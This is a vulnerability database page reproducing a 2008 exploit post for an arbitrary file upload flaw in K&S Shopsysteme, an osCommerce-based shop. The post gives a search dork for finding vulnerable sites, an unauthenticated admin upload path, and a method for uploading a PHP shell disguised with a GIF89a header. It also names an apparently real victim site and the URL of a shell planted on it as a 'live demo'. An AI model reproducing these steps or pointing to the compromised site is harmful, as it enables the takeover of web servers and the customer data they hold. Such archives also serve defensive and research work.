Lucene search

K

KS Shopsysteme - Arbitrary File Upload

🗓️ 17 Dec 2008 00:00:00Reported by mNtType 
exploitpack
 exploitpack
👁 11 Views

Arbitrary File Upload vulnerability in K&S Shopsysteme new version oscommerc

Show more
Code
## Script Name: Shopsysteme (new version oscommerce)

## Download: http://www.shopsystem-forum.de/product_info.php?cPath=22&products_id=43 (299 euro)  :) 

## Author: mNt

## File Upload Bug

## Google Dork: intext:Powered by K&S Media Concept - Shopsysteme [Powered by K&S Media Concept - Shopsysteme için yaklaşık 32.900 sonuçtan 191 - 200 arası sonuçlar (0,51 saniye)]

## Use:

http://www.example.com/

after add: /admin/editor/images.php ==> http://www.example.com/admin/editor/images.php

File uploaded php shell

after in url: http://www.example.com/images/upload/mNt.php

Attention: Shell Code Ä°n GIF89;a

## Live demo: http://www.trampleandfetish.de/admin/editor/image.php

## Php Shell Adres: http://www.trampleandfetish.de/images/upload/data.php

## Thanks: DelİDolU, HeDgEs, Scarface, Cih@t, Suskun Dünyam, Lodos2005, Sabotage

## web Site: www.rootingforced.org || www.rootingforced.com || www.rootingforced.net

# milw0rm.com [2008-12-17]

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo
17 Dec 2008 00:00Current
0.3Low risk
Vulners AI Score0.3
11
.json
Report